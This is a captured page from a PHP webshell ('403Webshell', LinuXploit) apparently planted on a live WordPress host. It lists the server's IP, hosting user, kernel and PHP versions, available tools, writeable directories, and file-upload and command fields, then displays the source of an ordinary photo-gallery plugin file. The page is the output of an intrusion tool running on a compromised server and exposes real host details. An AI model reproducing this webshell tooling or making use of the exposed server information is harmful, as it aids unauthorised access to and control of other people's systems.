403Webshell
Server IP : 198.54.115.198  /  Your IP : 216.73.216.142
Web Server : LiteSpeed
System : Linux server192.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User : seatpheu ( 1569)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /proc/self/cwd/wp-content/plugins/navz-photo-gallery/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/wp-content/plugins/navz-photo-gallery/includes/acf_photo_gallery.php
<?php

// exit if accessed directly
if( ! defined( 'ABSPATH' ) ) exit;

//Helper function that makes the images into a resuable array
function acf_photo_gallery_make_images($attachment_ids, $field, $post_id = null, $order = 'ASC', $orderby = 'post__in'){
	global $wpdb;
	$attach_ids = explode(',', $attachment_ids ?? '');
	$args = array( 'post_type' => 'attachment', 'posts_per_page' => -1, 'post__in' => $attach_ids, 'order' => $order, 'orderby' => $orderby );
	$get_images = get_posts( $args );
	$images = array_filter($get_images);
	if( is_array($field) ){
		$fieldname = $field['name'];
	} else {
		$fieldname = $field;
	}
	$array = array();
	if( count($images) ):
		foreach($images as $image):
			$title = $image->post_title;
			$content = $image->post_content;
			$full_url = wp_get_attachment_url($image->ID);
			$thumbnail_url = wp_get_attachment_thumb_url($image->ID);
			$meta_data = wp_get_attachment_metadata($image->ID);
			foreach (array_keys($meta_data['sizes']) as $size) {
				$meta_data['sizes'][$size]['source_url'] = wp_get_attachment_image_url($image->ID, $size);
			}
			$alt_text = get_post_meta($image->ID, '_wp_attachment_image_alt', true);
			$large_srcset = wp_get_attachment_image_srcset( $image->ID,'large', $meta_data);
			$medium_srcset = wp_get_attachment_image_srcset( $image->ID,'medium', $meta_data);
			$url = get_post_meta($image->ID, $fieldname . '_url', true);
			$target = get_post_meta($image->ID, $fieldname . '_target', true);
			$array[] = array(
				'id' => $image->ID,
				'title' => $title,
				'caption' => $content,
				'full_image_url' => $full_url,
				'thumbnail_image_url' => $thumbnail_url,
				'large_srcset' => $large_srcset,
				'medium_srcset' => $medium_srcset,
				'media_details' => [
					'width' => $meta_data['width'],
					'height' => $meta_data['height'],
					'sizes' => $meta_data['sizes']
				],
				'alt_text' => $alt_text,
				'url' => $url,
				'target' => $target
			);
		endforeach;
	endif;
	return $array;
}

function acf_photo_gallery($field = null, $post_id = null, $order = 'ASC', $orderby = 'post__in'){
	$images = get_post_meta($post_id, $field, true);
	return acf_photo_gallery_make_images($images, $field, $post_id, $order, $orderby);
}

function apgf_update_donation(){
	$nonce = !empty($_GET['nonce']) ? sanitize_text_field(wp_unslash($_GET['nonce'])) : '';
	$option = !empty($_GET['option']) ? sanitize_text_field(wp_unslash($_GET['option'])) : '';

	if ( $nonce && wp_verify_nonce( $nonce, 'acf-photo-gallery-field\navz-photo-gallery-nonce' ) && in_array($option, ['yes','no','already','later'], true) ) {
		global $wpdb;
		update_option("apgf_donation", serialize(
			array(
				"option" => $option,
				"timestamp" => gmdate('Ymd', strtotime("+30 days"))
			)
		));
	} else {
		$option = unserialize(get_option("apgf_donation"));
		if(is_array($option)){
			$currTime = gmdate('Ymd');
			$time = $option['timestamp'];
			$result = [
				"show" => ($option["option"] === "later" && current_user_can('administrator') && $currTime > $time) ? true: false
			];
			wp_send_json( $result );
		} else {
			wp_send_json(["show" => true]);
		}
	}
	die();
}
add_action('wp_ajax_apgf_update_donation', 'apgf_update_donation');

Youez - 2016 - github.com/yon3zu
LinuXploit